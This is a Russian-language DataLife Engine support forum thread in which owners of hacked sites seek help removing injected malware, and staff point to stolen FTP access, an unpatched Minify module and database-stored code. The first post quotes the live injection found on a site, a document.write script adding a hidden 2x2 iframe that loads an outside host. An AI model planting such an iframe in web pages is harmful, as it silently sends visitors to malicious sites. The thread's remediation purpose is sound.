Перейти к публикации

Рекомендованные сообщения

Вы проверяли сайт: http://uroboros-team.ru/

На сайте обнаружен вирус!

На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

Одну вставку нашел и удалил, вторую не получается. Она расположена в самом низу. Большая просьба сказать мне, где Я могу найти кусок этого кода и удалить.

PS: Как и кто вставил этот код в скрип - загадка.

В файле mail.tpl, этого нет, хотя показывает, что именно там...

</body> </html> <!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) --> <script type="text/javascript"> document.write('<iframe src="http://flipsphere.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script>

:ph34r: Пока дождешься... Сайт снести легче.

Ссылка на сообщение
Поделиться на других сайтах

http://dle-news.ru/info/1508-otpusk.html

Ссылка на сообщение
Поделиться на других сайтах

RACEDEMON,

Он у вас прописан в index.php в самом низу. На данный файл нет и не должно быть прав на запись со стороны скриптов. Скорее всего у вас был украден FTP или root доступ к серверу. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP.

Ссылка на сообщение
Поделиться на других сайтах
  • 1 год спустя...

sakhfguz.ru

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

Последний раз изменял

slider.tpl

sidebar.tpl

main.tpl

Но там все чисто

Ссылка на сообщение
Поделиться на других сайтах

Леопард,

У вас не был установлен патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Ставьте патч, меняйте пароль к БД, как удалять код написано на странице http://forum.dle-news.ru/index.php?showtopic=64224&st=20

Ссылка на сообщение
Поделиться на других сайтах

Леопард,

У вас не был установлен патч http://dle-news.ru/b...ule-minify.html

Ставьте патч, меняйте пароль к БД, как удалять код написано на странице http://forum.dle-new...pic=64224&st=20

./engine/cache/system/minify_dbconfig.php.js_b1526ad0e90068d67e8a80625a8fa29d.gz 170 b 01.09.2013 13:10:04 неизвестен дистрибутиву ./engine/cache/system/minify_dbconfig.php.js_b1526ad0e90068d67e8a80625a8fa29d 285 b 01.09.2013 13:10:04 неизвестен дистрибутe

Это удалить?

Изменено пользователем Леопард
Ссылка на сообщение
Поделиться на других сайтах

Это удалить?

Можно спокойно удалять.

Удалил все равно показывает вирус, Что делать?

Я правильно заплатку поставил?


<?php

if (isset($_GET['f'])) {

	   $_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']);

}

/**

* Front controller for default Minify implementation

*

* DO NOT EDIT! Configure this utility via config.php and groupsConfig.php

*

* @package Minify

*/

define('MINIFY_MIN_DIR', dirname(__FILE__));

// load config

require MINIFY_MIN_DIR . '/config.php';

// setup include path

Вот что я нашел в /public_html/engine/editor/scripts/webfont.js

  var arrSysFonts = ["impact", "palatino linotype", "tahoma", "century gothic", "lucida sans unicode", "times new roman", "arial narrow", "verdana", "copperplate gothic light", "lucida console", "gill sans mt", "trebuchet ms", "courier new", "arial", "georgia", "garamond", "arial black", "bookman old style", "courier", "helvetica"];

Удалил

Заменил webfont.js

из дистрибьютива

Ссылка на сообщение
Поделиться на других сайтах

Дата проверки: 19/09/2013 04:38:38

Тип проверки: полная (antivirus-alarm + мировые антивирусные базы)

Список проверяемых файлов:

1. http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js, тип файла: javascript

содержит сомнительную ссылку по версии гугла: ajax.googleapis.com

2. http://sakhfguz.ru/engine/editor/scripts/webfont.js, тип файла: javascript

содержит сомнительную ссылку по версии гугла: ajax.googleapis.com

содержит сомнительную ссылку по версии гугла: fonts.googleapis.com

3. http://sakhfguz.ru/templates/Pisces/js/libs.js, тип файла: javascript

4. http://sakhfguz.ru/templates/Pisces/js/slides.js, тип файла: javascript

5. http://sakhfguz.ru/engine/classes/min/index.php?charset=windows-1251&g=general&9, тип файла: javascript

содержит сомнительную ссылку по версии гугла: ajax.googleapis.com

содержит сомнительную ссылку по версии гугла: fonts.googleapis.com

содержит сомнительную ссылку по версии гугла: yandex.ru

содержит сомнительную ссылку по версии гугла: www.liveinternet.ru

6. http://sakhfguz.ru, тип файла: html

содержит сомнительную ссылку по версии гугла: ajax.googleapis.com

содержит сомнительную ссылку по версии гугла: fonts.googleapis.com

содержит сомнительную ссылку по версии гугла: yandex.ru

содержит сомнительную ссылку по версии гугла: www.liveinternet.ru

Не получется удалить, поставил код


<?php

/**

* Front controller for default Minify implementation

*

* DO NOT EDIT! Configure this utility via config.php and groupsConfig.php

*

* @package Minify

*/

if (isset($_GET['f'])) {

	   $_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']);

}

define('MINIFY_MIN_DIR', dirname(__FILE__));

// load config

require MINIFY_MIN_DIR . '/config.php';

// setup include path

set_include_path($min_libPath . PATH_SEPARATOR . get_include_path());

require 'Minify.php';

Minify::$uploaderHoursBehind = $min_uploaderHoursBehind;

Minify::setCache(

    isset($min_cachePath) ? $min_cachePath : ''

    ,$min_cacheFileLocking

Пароль к БД сменил

А вредоносный код удалить не получается

Ссылка на сообщение
Поделиться на других сайтах

Леопард,

Смотрите внимательно по ссылке что я вам дал http://forum.dle-news.ru/index.php?showtopic=64224&st=20 этот код у вас в БД, и удалять нужно его из БД, а не из файлов. У вас нет его в файлах

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...